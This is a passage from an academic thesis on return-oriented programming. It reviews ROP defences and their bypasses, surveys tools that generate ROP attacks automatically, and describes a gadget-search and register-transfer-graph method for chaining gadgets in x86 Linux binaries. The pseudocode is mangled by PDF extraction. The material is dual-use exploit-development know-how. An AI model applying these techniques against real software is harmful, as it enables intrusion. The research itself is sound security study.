structions within the kernel. However, the control flow of the kernel is now being
subverted using jmp instruction, resulting in increased number of jmp instruction in
the binary logic of the kernel. As the approach does not ensure resilience towards
Jump Oriented Attacks, the increased number of jmp instructions enrich the set of
15
Chapter 2. Background
JOP gadgets, proving additional opportunities in favour of JOP attackers. Although
this system defeats the known return oriented rootkits at that time, it does not provide
a full-proof and generic protection against all variations of ROP attacks.
2.4.3 HyperCrop
HyperCrop [11] is hypervisor i.e. Virtual Machine Manager (VMM) approach to defeat
x86 return oriented programming attacks, built on top of the XEN hypervisor [40]. In
this context the use of the VMM is to intercept stack writes that occur along program
execution, and inspect the content on the stack to determine the thread of a ROP
attack. The system works such that in the initial step, gadgets addresses are extracted
from the binary / library which is protected by the system. The addresses represent a
set of gadget addresses which can be potentially used by an attacker in a ROP scenario.
During the execution of the program 400 bytes are copied from the top of the stack,
which correspond to 100 32bit entries on the stack. Finally each 100 entries are then
cross-referenced against the predefined set of potential gadget addresses. If the ratio
of the number of entries that correspond to the set of potential gadget addresses
against the total number of entries is above carefully chosen threshold, then the system
assumes the potential thread of a ROP attack.
The analysis of the system introduced a performance overhead of 1.4, suggesting that
the system is practical to use to defend against ROP attacks. However the approach has
several limitations. As the binary size of different programs / libraries vary according
to their code base, the threshold used as a heuristic to determine the potential of a
ROP attack must be calculated and normalized for each individual program / library.
Furthermore, each time a program / library is updated and recompiled, the set of
potential gadget addresses must be updated, and, as the cardinality of the set of
potential gadgets can potentially chance, the threshold must be recalculated again.
This makes the system tedious to use and infeasible for deployment on a large scale.
Second problem is the heuristics based on a pre-determined threshold. As the system
only analyses 100 entries from the stack, an attacker can use the so called esp lifting
technique [31], to increase the value of esp with the use of a single gadget. Single
increment of esp will execute to the next gadget available on the stack in a ROP attack.
And if esp is increased by a particular value x, then the CPU will execute the gadget
located at address which resides on the stack position esp+x. This technique can
basically jump over the stack, creating holes inside, which can be filled with bogus
values. If the attack is crafted such that those bogus values do not correspond to
gadget addresses, the ratio of potential gadget addresses against total entries in the
stack can be reduced bellow the value of the threshold, bypassing the HyperCrop
16
2.4. Defence Techniques
detection.
Finally HyperCrop is defenceless against jump oriented programming attacks, since
this types of attacks do not rely on the stack values for control flow retention.
2.4.4 ROPdefender
ROPdefender [12] is a neat technique able to defend against the traditional ROP
attacks using a binary instrumentation framework [41]. The implementation of this
approach is build on top of Pin utilizing the VM emulation unit and just in time
compiler unit to build a shadow stack, similar to the one used in StackGhost [42].
When a call or return instruction occurs, ROPdefender uses the inspection routines
provided by Pin to intercept the instructions. Once a call is encountered, the return
address is pushed on the shadow sack. And when a return instruction occurs, a check
is enforced between the return address the stack pointer points to (i.e., the return
address on the program stack) and the saved return address placed on top of the
shadow stack. If the values do not match, then a ROP attack is detected.
Since the fundamental set of circumstances that make return oriented programming
possible is having the return addresses written on the same stack where arbitrary data
is placed, the approach to keep a copy of the return addresses in a shadowing stack
is quite an elegant solution to avoid ROP attacks. However, the greatest drawback of
ROPdefender is the performance overhead, which in the worst case introduces 3.54
times slowdown then compared to a normal execution of a program. Although most
of it results as a consequence of the performance overhead of Pin, the only feasible
deployment scenario on a large scale would be implementation of ROPdender logic
on the hardware level. Still, similarly to the HyperCrop model, ROPdefender does not
provide mechanism to defend against ROP attacks based on indirect jumps. Since
indirect jumps do not disrupt the calling sequence inside a running program, the
shadow-stack verification of return addresses is futile.
2.4.5 G-Free
G-Free [13] is another system aiming to provide a system to address the wide range
of common code reuse attacks. It focuses on securing libc library to prevent return-
into-libc attacks, by keeping the attacker of reusing existing fragments of code as
basic building blocks. The protection addresses both the intended and unintended
instructions. The protection for the latter is achieved using code rewriting techniques
to remove unintended instructions by aligning instructions using alignment sled,
17
Chapter 2. Background
sufficiently large instruction sequences, having no effect once executed. Combined
with removal of occurrences of the c3 and c2 bytes, the system reduces the number
of unintended gadgets in libc. To protect the intended instructions from being
reused as gadgets, the system incorporates return address protection, by introducing
instructions header to encrypt the return address pushed on the stack and instructions
footer to decrypt the return address before return instruction occurs.
The system also provides protection against indirect jumps and demonstrates a solid
protection against traditional ROP and all its variations, with a very small performance
overhead of about 5.6% in the worst case. Nevertheless, it is quite difficult to recognize
how the system performs on intensive benchmarks, since the performance evaluation
addressed use-cases where the control flow was not the most crucial part (IO-bound
and kernel based workloads). Regardless of the fact that G-Free provides a comprehen-
sive solution to defend against ROP attacks, it has been attested only as a prototype,
furnishing ROP protection within the implementation of libc. The low deployment
of the principle on a large scale of software across different architectures, operating
systems and user-end applications, leaves the thread of ROP in the heart of security
problems.
2.4.6 Control Flow Integrity
Control Flow Integrity [14] is a code rewriting technique, that incorporates lightweight
static verification to instrument runtime checks to prevent code reuse attacks. As
changing the control flow of the program is the essence in the ROP based exploits,
this technique ensures that a program follows its control flow graph (CFG), generated
ahead of time. The implementation is based on modified XFI [43], to support the
so-called individual label instructions that indicate the beginning of a particular
function, without affecting its semantics (prefetch instruction). During the execution
of a program, the system checks whether the labels point to a valid branch instruction,
and when a function returns the system also checks whether the pointer point to a
valid return address, constraining the binary to follow an expected control flow.
The rewriting engine of XFI, analyses the binary and finds all branching instructions.
According to this analyses, the system preforms the code rewriting instrumenting the
branching instructions to enforce the CFG program flow. Unfortunately the drawback
as a result of the binary analysis, is the fact that this system is addressing intended
instructions only. Having a ROP attack crafted with gadgets consisted of unintended
instruction, will eliminate the ability to verify that a return address points to a valid
label instruction. Furthermore, the performance overhead introduced by this system
(∼45% in the worst case) is an additional reason why this system has not seen any
18
2.4. Defence Techniques
significant production deployment.
A follow up work, sharing the same fundamentals of CFI is the control flow locking
(CFL) system [15]. Unintended instructions are removed using already existing tech-
nique - software fault isolation [44]. Instead of introducing label instructions to detect
control flow violation before it occurs, CFL lazily detects the violation, after the trans-
fer occurs. This is done by performing a lock operation before each indirect control
flow transfer, with a corresponding unlock operation present at valid destinations
on binaries and static libraries. The work presented in this system, fills in the gaps
originating from the initial work of CFI. The low performance overhead ((∼23% in
the worst case), provides competitive results towards any other defence mechanisms
dealing with code-reuse attacks. Although the technique can be easily ported to sup-
port dynamically linked libraries, giving the opportunity to defend against code-reuse
attacks, the low deployment of the system makes the use of ROP attacks plausible.
19
3 Related Work
Section 2.4 gives an overview of the available defence techniques against ROP attacks,
their flaws and deployment rate and clearly shows that return oriented programing is
a crowded, important research area. It also demonstrates the inability to provide an
extensive defence mechanism against all ROP attacks, as the mechanisms developed
along the way only resembled piecemeal defences to address each new variant of code
reuse attack, as it occurs.
On the other hand, the evolution of defence techniques was also contentiously ini-
tiating new approaches to develop attack techniques to defeat the widely deployed
security systems. As a result, the attacker were becoming increasingly sophisticated,
and harder to create. At the same time, different architectures, different operating
systems, diverse distribution and applications was additional incentive for attackers
to develop tools to automatize the creation of code reuse attacks, enabling them to
target the wide areas of users using different systems.
The recent work in ROP attacks clearly shed lights on the danger conveyed of these
attacks. Apart from developing defence techniques, attackers also used tricks and
methods to disguise the generated attacks, by creating polymorphic variants, packed
payload, and even ASCII printable payloads [36] to evade non-ASCII filtering. In the
following sections we describe the current tools and methods to create automatic
ROP attacks, portable on different systems and architectures. As the attackers can
potentially have unlimited use of imagination to fork different ideas, we only address
the known techniques in the academic world.
21
Chapter 3. Related Work
3.1 Q
Q proposes software verification techniques to automatically create ROP attacks [16].
The system is also able to harden existing exploits. In this context hardening denotes
the process of rewriting the logic of the exploit to bypass W⊗
X and ASLR, assuming
that the exploit is unusable when those defences are enforced. We concentrate on the
automatic generation of ROP attacks. A Q exploit is constructed in several stages:
1. Gadget Discovery. This stage locates predefined table of gadgets types preform-
ing arbitrary binary operations, accessing memory, branching instructions,
arithmetic operations, and gadgets moving data from one register to the other.
Q required the gadgets to be constrained to have know side effects, constant
stack offset and able to transfer the execution control to the next gadget. For
each gadget the weakest precondition and strongest postcondition are specified.
Then the gadget is semantically checked to determine whether it matches one
of the predefined gadget types.
2. Gadget Arrangement. In this stage, instruction selection is performed, in order
to implement a given computation. Having many ways of combining gadgets to
produce a particular computation, the instruction combination in this context
is represented by different gadget arrangements.
3. Gadget Assignment. Once different gadget arrangements are considered, Q
determines if a gadget arrangement can be satisfied. The algorithm in this
context iterates through possible arrangements and schedules, to verify whether
the arrangement satisfies the desired computation.
4. Gadget Output. Once gadget arrangements are found to have satisfiable assign-
ments, Q prints the bytes of the payload.
The produced attack is able, to either call function that resides in the target binary,
call external function in libc, or write four bytes to an arbitrary address. Results
showed that Q is able to generate exploits for more than 80% of the binaries locating
in /usr/bin/, having size of at least 20KB. Despite the good results in exploit creation,
Q has rather practical goals, involving generation of traditional ROP exploits, as it
provides the features to execute internal and external functions. Traditional ROP
exploits involve calling function as system to lunch a shell, or call mprotect, to disable
W⊗
X and proceed with exploit containing executable machine code. Therefore the
success and complexity of a Q generated exploit relies on the existing internal and
external functions. Q is unable to generate higher level attacks, as its goals do not
involve generating a Turing complete set of instructions.
22
3.2. Return Into libc Attacks
3.2 Return Into libc Attacks
On the Expressiveness of Return-into-libc Attacks (RILC) [17] is a splendid demonstra-
tion on the Turing completeness (TC) of the return-into-libc attacks. It enfolds a
decade of using RILC in creating code reuse attacks, overturning general misconcep-
tion that RILC attacks are not Turing complete. Without focusing in depth on the
implementation, the research work concentrates on combining functions from libcto ensure RILC functionality to provide:
• General arithmetic and logic operations
• Memory accesses
• Branching
• System calls
Each of the RILC functionalities mentioned above, are implemented with POSIX
complaint functions available across different operating systems. It also incorporates
the presence of other function in the mostly POSIX complaint environments (such as
Windows). To demonstrate Turing completeness, the system builds a turing machine
simulator on Debian and Windows XP. Although the ROP attacks using this approach
are still built manually, the well defined POSIX standard in the C library, having
consistent interface, can provide attacks that require only minor modifications to be
ported on cross OS systems (changing the function offsets). Furthermore, as many
application depend on the standard interface implementation of the libc, it is quite
dificult to simply remove any subset of instruction of lib, or even modify the interface.
However, in comparison with standard ROP attacks this approach has certain disad-
vantages. Namely, the ROP payloads defined by RILC are significantly larger, due to
many function calls. Furthermore, the efficiency of the payload is also significantly
reduced. The comparison of a simple Turing machine simulator built in C, with its TC-
RILC ROP counterpart, yields results where TC-RILC is 2000 time slower. Finally, this
technique does not apply on operating systems where libc is missing, or applications
where libc is not used.
3.3 Reverse Engineering Intermediate Language
Reverse Engineering Intermediate Language (REIL) [18] is a framework that provides
automatic gadget search across different CPU architectures. The gadget search is
23
Chapter 3. Related Work
implemented such that the system searches for pre-determined instruction templates
(REIL representation). Each of the instruction templates are specified manually, and
the gadget search algorithm finds single gadget performing the operation specified
by the template. Similarly to the RILC work, the templates are defined such that
the operations perform arithmetic, logical and bitwise operations and data transfer
instructions. The aim of the REIL framework is to ensure Turing completeness, by
finding sufficient gadget instructions to implement the ultimate reduced instruction
set computer (URISC) [45]. It operates in three stages:
1. Stage I uses similar approach as the Galileo algorithm to extract gadgets. Once
a gadget is found, its REIL representation is determined corresponding to the
predefined templates.
2. Stage II analyses the extracted gadgets and gathers informations of the effects
induced by executing the instructions occurring in each gadget. This infor-
mation is represented by generating expression trees on the semantic of the
gadget.
3. Stage III performs the gadget search. All potential gadgets obtained from the
previous stages are organized as expression trees. A core search algorithm
compares the expression trees of every potential gadgets to expression trees that
reflect a particular operation. If all conditions are met for a potential gadget,
then the gadget is included in a list of specific gadgets. Finally, the complexity of
the gadget is calculated. The last process is two fold. In the first step it analyses
the registers and memory locations affected by the use of the gadget. In the
second step it analyses the complexity of the gadget by counting the nodes of the
expression trees of the gadget. The second analysis minimizes the complexity
of instructions to satisfy particular operation.
The framework provides an extensive gadget search taking into consideration architec-
ture dependent characteristics, making it available across ARM, SPARC, PowerPC and
MIPS architectures. It also successfully builds a Turing complete sets of operations
on Windows Mobile, iOS and Symbian, taking into consideration common libraries,
such as coredll, libsystem and euser. However this system heavily depends on the
presensce of common libraries. Similar to the RILC model, this technique ensures the
Turing completeness, assuming that common libraries are likely to have enough gad-
gets able to match the predefined template operations. Having REIL to automatically
construct a ROP attack will require much extensive overlook in the side effect inflicted
by the use of the gadgets to fully automatize the generation of the attack.
24
3.4. Return Oriented Rootkits
3.4 Return Oriented Rootkits
Return-Oriented Rootkits: Bypassing Kernel Code Integrity Protection Mechanisms [19]
is the only related work that provides fully automatic generation of return oriented
attacks, targeting the Windows kernel. As the logic of the rootkit is implemented using
return oriented programming, we focus on the generation of the attack. The system is
consisted of 3 modules:
1. Constructor. This module proceeds in two steps. In the first step, it searches
for single instructions, followed by a free branch instruction. The search is
focusing on predefined set of instruction, characterised as useful instruction. In
the second step, the construction chains gadgets together, to form structured
gadgets designated to perform basic operations (logical, arithmetic, control flow,
stack manipulation and bitwise operations). In order to find all the necessary
gadgets to perform the operation, as well as to control the which registers are
modified when a particular gadget is used, a set of CPU registers is specified
- working registers. Finally the constructor merges gadgets having instruction
operating with the worker registers to perform particular operation.
2. Compiler. This building block takes into consideration the gadgets provided
by the constructor, and a higher level source code, and produces the attack
payload. The source code is written in a dedicated C-like language. In this stage,
the compiler chains the gadgets generated from the constructor to implement
the semantics given in the source code.
3. Loader. The output generated from the compiler results into generation an
exploit having the relative addresses of the program image. The loader adjusts
the offsets of the addresses, and resolves them into absolute addresses.
The system has shown to automatically generate exploits across different Windows
OS kernels, as well as to provide a good runtime overhead of the exploits and rather
small sized payloads. However this technique by all means is not a comprehensive
solution towards automating ROP attacks. The most considerable drawback is the
search of a single-instruction gadgets. The binary code of typical OS kernel is very
likely to contain huge sets of gadgets that have single instruction as a result of its
binary code magnitude. Therefore, it is possible to match all useful instruction defined
in the context of this work. Nevertheless, this commodity can only be expected
in OS kernels and potentially common libraries. On the other hand, some widely
develop application in their binary code do not particularly provide even the basic
set of arithmetic, bitwise or logical single-instruction gadget. Closely looking at the
25
Chapter 3. Related Work
implementation details of the construction, we can note that the working register
set is restricted on three registers only, namely eax, ecx and edx. This significantly
reduces the flexibility of the gadget search and gadget chaining, as it is very hard to
find gadget operating exclusively on the specified registers, when the system is used
outside the OS kernel.
26
4 Automatic Return Oriented Program-ming
Chapter 3 gives an overview of the available techniques and approaches in automatic
generation of code reuse attacks. Each of the techniques focuses on set of common
libraries or operating system kernels. The convenience of creating attack techniques
on large chunks of machine code found in kernels and common libraries, is the
resulting rich set of gadgets. Therefore, most of those technique rely on predefined
set of template instruction and register sets looking for a single instruction gadgets,
assuming that the common library or operating system kernel are likely to have all
required gadgets. However this approach does not apply on reduced set of gadgets,
often found in small libraries, and stand-alone executables.
Our focus in this work are stand-alone executables. As previously discussed, the
traditional way of crafting a ROP attack is by invoking mprotect to disable the W⊗
X
protection on the system and inject random code, or invoking execve to start a remote
shell on the target machine. Despite the fact that those functions are available across
different operating systems and distributions, a stand-alone binary does not necessary
need to be linked against system libraries. Therefore exploiting a vulnerability requires
making use of the gadgets already available in the binary. To make the best out of the
available gadgets, we observe:
1. If there is no gadget available that does a particular logical or arithmetical
operation we might be able to find suitable substitution.
2. If there is no gadget and no substitution, then that particular operation will not
be available in the ROP attack.
3. If there are only few gadgets available, then gadget chaining requires to move
the data between registers, such that the result of one operation can be used as
an input to the next operation.
27
Chapter 4. Automatic Return Oriented Programming
The first observation proposes that if a gadget having inc functionality is not available
in the system, it might be possible to substitute it with a gadget having add functional-
ity. However, if inc and add functionality gadgets are not available in the executable,
then this operation will be unavailable in the attack according to the second observa-
tion. In order to illustrate the third observation, we assume that an executable is given,
having the gadgets on Figure 4.1. We would like to use the three gadgets to calculate:
edx = edx - ebp - ecx
0xb9268970: add ebp, ecx ret
0x42295cee: sub eax, edx inc [esi+0x5D5B]
ret
0x42295cee: mov ecx, eax ret
Figure 4.1: Available gadgets
Although the simplest implementation of this calculation is using sub ebp, edx;sub ecx, edx, those gadgets are not available in the system. Thus, the sum of ebpand ecx is calculated first, and then the result is subtracted from edx. However to do
this, we need to pass the result from the first computation as input to the next gadget
using a mov instruction gadget (Figure 4.2)
0xb9268970: add ebp, ecx ret
0x42295cee: sub eax, edx inc [esi+0x5D5B]
ret
0x42295cee: mov ecx, eax ret
1
3
2
Figure 4.2: Simple gadget chaining
28
4.1. Process Image Analysis
There are 8 32 bit CPU registers. Having in mind that each instruction having two
operand can use any of the 8 CPU instruction, there are 64 possible combinations for
every computation (arithmetic, logical, etc). The number significantly increases, when
one of the operands is a memory segment, taking into consideration the base register,
displacement value etc. To be able to chain as many gadget as possible, we need to
know the data transfer relation between each of the registers in the system, as well
as memory. This data transfer relations also depend on the available gadgets in the
target executable. However, the reduced set of gadgets, significantly reduces the set
of single instruction gadgets, and gadgets of several instruction must be considered.
Subsequently the use of multi-instruction gadgets can cause unwanted side-effects,
which must be eliminated or taken into consideration.
In the following sections, we provide a description of system that automatize the
creation of ROP attacks in stand-alone executables on x86 architecture, using Linux as
an operating system. The system is consisted of several phases:
1. In the initial phase of the system, we dissemble the the target executable and
extract the raw bytes of the available gadgets.
2. The next phase considers the side effects imposed by the gadgets, and classifies
the extracted gadgets according their semantics.
3. We generate the register transfer graph to describes the relations between data
transfers of each CPU registers and memory.
4. Finally in the last phase, we use the register transfer graph to provide a compre-
hensive method to perform gadgets chaining.
Being aware of the CPU register interconnection, our system can introduce flexibility
on the set of CPU registers being used in the ROP attack, to avoid predefined sets
of registers, as seen in other systems. In addition, the flexibility in the register set
will narrow the search of gadgets performing particular operations, and contribute
towards creation in automatic ROP attacks by avoiding operation templates.
4.1 Process Image Analysis
The first step towards automating the gadget search, is extracting the machine code
of the target program. This can be done by dissembling the executable file of the
program, or by disassembling the binary code of the program when it is loaded into
memory. Linux (as many other Unix-like operating systems) provides a mechanism
29
Chapter 4. Automatic Return Oriented Programming
that describes each region of contiguous virtual memory in a process or thread. As
a result of simplicity of this mechanism (reading into /proc/[pid]/maps), we disas-
semble the program when it is loaded into memory.
0x00000000
Data Segment
BSS segment
Heap
Stack
Text Segment
Memory Mapping
Figure 4.3: Memory Lay-out of a Linux process
When a Linux process is loaded into memory, the OScreates different sections, containing executable code,static or dynamic data (illustrated on Figure ??). Itrandomizes the stack, heap, and shared libraries, butnot the program image (text, data & bss segments)[8]. Therefore the address offsets of the gadgets foundin the text section remain unchanged even when ASLRis enabled. On the other hand, when ASLR is disabled,the shared libraries will always be mapped to the sameregions, having constant address offsets in the librarygadgets, on every program invocation.
Programs can be manually compiled into position in-dependent executables (PIEs) and loaded to multiplepositions in memory. and many third-party applica-tions (including Mozilla Firefox) are deployed as PIE(having the program logic wrapped in a shared library).However modern distributions only compile selectivegroup of programs as PIEs, because doing so introducesa performance overhead at runtime.
In our implementation we use the fact that the text segment remains unchanged to
search for gadgets in this section. For the systems where ASLR is disabled, we ensure
that the implementation takes into consideration all executable sections. Simple
invocation of /proc/[pid]/maps will result with the following listing (inspecting
init process by reading the contents of /proc/1/maps):
08048000-08051000 r-xp 00000000 08:06 7209157 /sbin/init08051000-08052000 r--p 00008000 08:06 7209157 /sbin/init08052000-08053000 rw-p 00009000 08:06 7209157 /sbin/init08053000-08074000 rw-p 00000000 00:00 0 [heap]b7556000-b7557000 rw-p 00000000 00:00 0b7575000-b76db000 r-xp 00000000 08:06 5243163 /lib/libc-2.11.3.sob76db000-b76dc000 ---p 00166000 08:06 5243163 /lib/libc-2.11.3.sob76dc000-b76de000 r--p 00166000 08:06 5243163 /lib/libc-2.11.3.sob76de000-b76df000 rw-p 00168000 08:06 5243163 /lib/libc-2.11.3.sob7731000-b7732000 rw-p 00000000 00:00 0b7732000-b7751000 r-xp 00000000 08:06 5243156 /lib/ld-2.11.3.sob7751000-b7752000 r--p 0001e000 08:06 5243156 /lib/ld-2.11.3.so
30
4.2. Gadget Locations
b7752000-b7753000 rw-p 0001f000 08:06 5243156 /lib/ld-2.11.3.sobff91000-bffb2000 rw-p 00000000 00:00 0 [stack]ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso]
Using process traces (ptrace), we control the execution of the target program, and
inspect the internal state. PT_READ_I enables to read any section within the running
process. In this context, the text segment is simply the /sbin/init segment, marked
as r-xp. Once we are able to read the content of this section, we can process the data
into the gadget search algorithm. In systems where ASLR is disabled, all sections
marked as r-xp are taken into consideration.
4.2 Gadget Locations
The gadget search algorithm is performed on chunks of binary data. The algorithm
locates c2 and c3 bytes, as well as pop reg; jmp reg instructions, and backtracks to
a user defined threshold of bytes to find valid x86 instructions. A pseudo code of the
search algorithm is available bellow:
Algorithm 1 Gadget Search
Input: process segment as binary stream segOutput: list of gadgets
1: g ad g et s ←;2: for byte pos in seg do3: if i s_val i d_su f f i x(pos) then4: for i := 1 to thr eshol d do5: if x86_disasm(pos − i , pos) then6: add the gadget into g ad g et s7: end if8: end for9: end if
10: end for11: return g ad g et s
A threshold is necessary because otherwise all side effects of encountered instruc-
tions will make it infeasible to chain the gadgets. The implementation depends on
libdisasm library. In this context, x86_disasm used on line 5 in Algorithm 1 provides
basic disassembly of Intel x86 instructions from binary stream.
Each gadget obtained in the list will have a unique address. However, two or more
gadgets might as well perform identical instructions. To avoid having repetitive
31
Chapter 4. Automatic Return Oriented Programming
Algorithm 2 is_valid_suffix
Input: byte address posOutput: trueif a valid gadget suffix, otherwise false
1: if pos[0] = c3 or pos = c2 then2: return true3: end if4: if (p[0]⊗ 0xf8) = 0x58 and p[1] = 0xff and (p[2]⊗ 0xf8 ) = 0xe0 then5: if (p[0]⊗7) = (p[2]⊗7) then6: return true7: end if8: end if9: return false
gadgets, the machine code of each gadget is hashed, and test for existence is performed
before the gadget is added.
The threshold defined in the gadget search algorithm, can hold the bytes of several
instructions, and since the search algorithm backtracks from a free branch instruction,
very often happens that a gadget is a subset of another gadget, such that they differ
in the first few instructions. Therefore, in order to use every gadget possible, each
gadget is treated as a single instruction gadget, such that the first instruction is taken
into consideration only, regardless the number of following instruction until the free
branch instruction. Finally, it is only feasible to treat each gadget as single instruction
gadget if the side effects of the other instructions are taken into consideration.
4.3 Considering Gadget Side-Effects
In order to eliminate the side effects of each gadget, we must determine the change
of the sate that each instruction of the gadget makes. Take into consideration the
following example (obtained from section 2.1.2):
0xB7F9E479: mov %edi, %edx; incl 0x5D5B14C4(%ebx); ret
In order to use the gadget above as a single instruction gadget, taking into consid-
eration only mov %edi, %edx, we must ensure that incl 0x5D5B14C4(%ebx) will
increase the value of a know writeable location. Assuming that location 0x00000001 is
writeable and does not hold data used in the ROP attack, we can only use the gadget if
ebx is initialized to -0x5D5B14C3. In this context, we can resolve this issue, by using
pop gadget to initialize ebx with the value calculated before.
32
4.4. Gadget Classification
To address as many as possible of the known gadget side effects, we focus on the
following instruction types:
1. Memory Clobbering Instructions. This type of side effects are similar to the
example above. Generally speaking, memory clobbering can occurs, when a
gadget contains instruction between the first instruction and the free branch
instruction such that the target operand is a memory location. The memory
location is referenced by CPU registers. Therefore, the side effects of this type
of instructions can be removed by inserting pop gadgets to initialize the values
of the registers and designate the memory dereferencing to occur on a know
location. Having into consideration that the data segment has constant offsets
(as shown in section 4.1), several memory locations can be used in this section
as known clobbered locations. The only exception in this rule is when memory
clobbering occurs when the esp register is dereferenced. This is addressed in
the 3rd category.
2. Register Clobbering Instructions. Similarly to the previous case, this type of
instruction have the target operand as a register. In this case, we do not eliminate
the side effects, but we only mark the register clobbered by the instruction. In
special cases (mostly occurring in unintended instructions), where the target
operand of the first instruction in the gadget is a register being clobbered latter,
the gadget is being disregarded. In any cases, if the register being clobbered is
esp, the gadget is also disregarded.
3. Stack Modification Instructions. The side effects of this category are the most
critical, since the instruction of this type modify the stack, where the logic of
the ROP attack resides. Instructions that decrease the value of the stack pointer
can not be used (push, pusha, etc). This type of instructions modify the space
of the stack where the following gadget addresses are placed. Therefore the
gadgets having those instructions are disregarded. Gadget that increase the
value of the stack pointer can be used, by placing dummy values on the stack.
Note that gadgets having instruction of the type pop, popa, etc, which is not
the first instruction, fit in the 2nd category as well. Apart from introducing
additional dummy value on the stack, the clobbered register must be taken into
consideration.
4.4 Gadget Classification
Once each side effect is taken into consideration, the gadget can be classified accord-
ing to the first instruction. In our implementation we classify the gadgets into 13
33
Chapter 4. Automatic Return Oriented Programming
groups:
1. Stack manipulation: pop
2. Data transfer gadgets: mov, xchg,
les, lea, etc.
3. Arithmetic gadgets: add, sub, inc,
dec, shr, shl, etc.
4. Logic: and, or, xor, not, etc.
5. Control flow manipulation: jmp,
call, etc
6. Interrupts: int, int3, iret, into,
bound, etc.
7. Comparison: cmp, test, etc.
8. System calls: in, out, wait, ins,
etc.
9. Bit manipulation: btr, etc.
10. Flag manipulation: cld, clc, stc,
std, cmc etc.
11. Floating point unit manipulation:
fadd, fsub, fmul, fdiv, etc.
12. String manipulation: movs, cmps,
scas, lods, etc.
13. Other: nop
As this work targets stand-alone binaries, even rudimentary observation on the ob-
tained list of gadgets from stand-alone binaries. can depict the fact that the number
of gadgets in the first 6 groups is significantly surpassing the number of gadgets in
the other groups. This is due to the fact that most commonly used binaries do not
extensively use floating point manipulation, nor call interrupts or even system calls.
Consequently the implementation in this work, completely disregards the existence
of gadgets in groups 8 to 13.
Most frequently found gadgets are pop reg gadgets, in most cases addressing each 8
CPU registers. Less frequently gadgets are data transfer gadgets. And finally almost
every stand-alone binary has at least one of each of the arithmetic and logic gadgets.
The gadget classification notable narrows the gadget search space and is used in the
next step, namely the generation of the register transfer graph.
4.5 Building the Register Transfer Graph
The register transfer graph (RTG) is a directed graph representing the data movement
between CPU registers and memory. Each node in the graph represents either CPU
register or memory location referenced by register with or without a particular dis-
placement. Each edge on the graph represents a gadget that holds instruction to pass
the data from one node to the other. The edge labels represent the instruction used to
transfer the data between the nodes, and the registers stored in brackets represent the
34
4.5. Building the Register Transfer Graph
clobbered registers as a result of using the gadgets illustrated by the edge.
eax
ecx + 0x2be8
mov
edx + 0x8
mov [esi,edi,]
edi
mov [esi,edi,]
ecx
mov [ebp,]
edx
or
eax + 0x8
mov
ebx
xchg
esp
ebp
mov [ebp,]mov [ebp,]
esi
xchg
or
al
mov [ebx,]
dl
mov
eax
mov
ecx + 0x2344
mov
X X
Memory Add.CPU Register Data Movement
Figure 4.4: Apache/2.2.17 (Linux/SUSE) register transfer graph
The register transfer graph takes into consideration the data transfer gadgets, the
arithmetic and logical gadgets, such that:
• Data transfer gadgets. Once xchg and mov gadgets are found, those are inserted
directly in the graph as edges.
• Arithmetic gadgets. When add and sub gadgets are found, those are placed in
the graph only if the target can be initialized with 0. For the sake of simplicity
only pop gadgets are considered as initialization gadgets. The initialization
gadgets are used priori to the use of the data transfer gadget.
• Logical gadgets. Similarly to the previous group, logical gadget are also used
to transfer data between registers, only if the target can be initialized. If orgadget is used, the target is initialized with 0, if and gadget is used, the target
is initialized with 0xFFFFFFFF and if xor gadget is used the target is initialized
with 0.
The resulting graph will contain every data transfer between two nodes. Hence two
nodes might be connected by more than one edge. In order to optimize the generated
graph, the edges causing redundant side effects must be eliminated. On the other
hand, several nodes can load data from memory to a CPU register and the other way
35
Chapter 4. Automatic Return Oriented Programming
around. The number of these nodes can be reduced only to the most relevant memory
nodes. We illustrate this process in the following two sections.
4.5.1 Register Clobbering Edges
When two nodes in the graph have more than one edge, we look closely into the
register clobbering imposed by the edge gadgets.
eax
edx
mov [ebp, ecx, edi] mov [ebp, ecx, ebx]
Figure 4.5: Edges with different set ofregisters
eax
edx
or [ebp] mov [ebp, ecx] mov [ebp, ecx, ebx]
Figure 4.6: Edges having subset of clob-bered registers
To remove the redundant edges, we focus on the three cases:
• Two edges clobber different set of registers. This case is illustrated in Figure
4.5. The use of each edge in the graph generates different side effects. Therefore
both edges are then considered in the graph.
• The set of clobbered register of one edge is a subset of the clobbered registersof another edge. In this case, the edge with larger set of clobbered registers
imposes redundant side effects, and therefore it is disregarded. Note that having
an edge with no clobbered registers is just a special case of this rule. In the
context of Figure 4.6, edge “or [ebp]” will be the only edge considered for the
data transfers between edx and eax.
• Two edges have equal set of clobbered registers. In this case the data transfer
gadgets (xchg and mov) have precedence over the other gadgets. This is due to
the fact that this type of gadgets do not require initialization, and therefore are
more efficient to perform the data transfer.
36
4.6. Discovering Register Candidates
4.5.2 Memory Transfer Nodes
Having redundant memory transfer nodes occurs when several gadgets are found that
perform data transfer from memory to a register.
eax
ecx + 0x70
mov
ecx + 0x2344
mov
ecx + 0x2be8
mov
ecx + 0x5abx
mov
Figure 4.7: Memory transfer nodes transferring data to one register
To reduce the number created memory nodes, we select the nodes being dereferenced
by a particular register. The node having the lowest absolute displacement value is
then taken into consideration, and the rest of the nodes are disregarded. The choice for
having the lowest displacement, is only for convenience, since accessing the memory
value of that node will require proper initialization of the dereferencing register by
subtracting the displacement value.
4.6 Discovering Register Candidates
Once the complete graph is generated, we already have all data movements between
registers and memory. This gives the opportunity to chain gadgets, by transferring the
result from the result of using one gadget to the input of the other gadget. Therefore,
in order to narrow the search to the gadgets that are able to chain their execution, we
need to find the set of register candidates. This set will ensure that data transfers are
possible from each register to every other register in the set. In terms of graph theory,
this set of registers is simply the strongly connected component in the graph. Bellow
we provide a pseudo-code of the Tarjan algorithm to efficiently calculate the strongly
connected components:
Note in this case that every memory node in the graph, can connect to any other
memory node in any direction. This is because the data stored in the memory can be
referenced by both nodes, the one which transfer memory from register to memory
and the other way around. To serve that purpose, we slightly adjust the algorithm
37
Chapter 4. Automatic Return Oriented Programming
Algorithm 3 Tarjan
Input: start vertex v , stack S and graph G = (V ,E)v.i ndex ← i ndexv.lowli nk ← i ndexi ndex ← i ndex +1S.push(v)for (v, w) ∈ E do
if w.i ndex is undefined thenTar j an(w)v.lowli nk ← mi n(v.lowli nk, w.lowli nk) w ∈ Sv.lowli nk ← mi n(v.lowli nk, w.i ndex)
end ifend forif v.lowli nk = v.i ndex then
repeatstart a new strongly connected componentw ← S.pop()add w to current strongly connected component
until w = voutput the current strongly connected component
end if
to take this case into consideration. Once memory is used to pass data from one
register to the other, it is written in a know location, reserved in the data segment of
the process image.
4.7 Encapsulation
The biggest challenge in chaining the gadgets is taking into consideration every side
